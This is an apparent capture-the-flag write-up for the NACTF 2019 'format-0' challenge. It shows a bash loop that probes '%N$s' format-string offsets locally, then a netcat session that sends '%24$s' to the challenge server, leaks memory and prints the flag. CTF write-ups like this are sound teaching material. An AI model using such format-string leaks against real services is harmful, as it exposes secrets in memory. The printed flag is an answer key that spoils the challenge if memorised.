Tags: binaryexploitation format-string
Rating:
First, create file "flag.txt" :
```
┌──[zer0@unknow]─[.../.../.../nactf/BinaryExp/Fmt#0]
└──╼ $echo "FLAG_FLAG_FALG_FLAG_FLAG_FLAG_FLAG" > flag.txt
```
Second, execut with `for loop bash script` to find string "FLAG_FLAG_FALG_FLAG_FLAG_FLAG_FLAG" :
```
┌──[zer0@unknow]─[.../.../.../nactf/BinaryExp/Fmt#0]
└──╼ $for i in {0..100}; do echo $i; echo '%'$i'$s' | ./format-0 ; done;
23
Type something>You typed: ���
24
Type something>You typed: FLAG_FLAG_FALG_FLAG_FLAG_FLAG_FLAG
25
Type something>You typed: Segmentation fault
```
last, use number 24 to leak memory where f is located :
```
┌──[zer0@unknow]─[.../.../.../nactf/BinaryExp/Fmt#0]]
└──╼ $nc shell.2019.nactf.com 31782
Type something>%24$s
You typed: nactf{Pr1ntF_L34k_m3m0ry_r34d_nM05f469}
```
FLAG: **`nactf{Pr1ntF_L34k_m3m0ry_r34d_nM05f469}`**
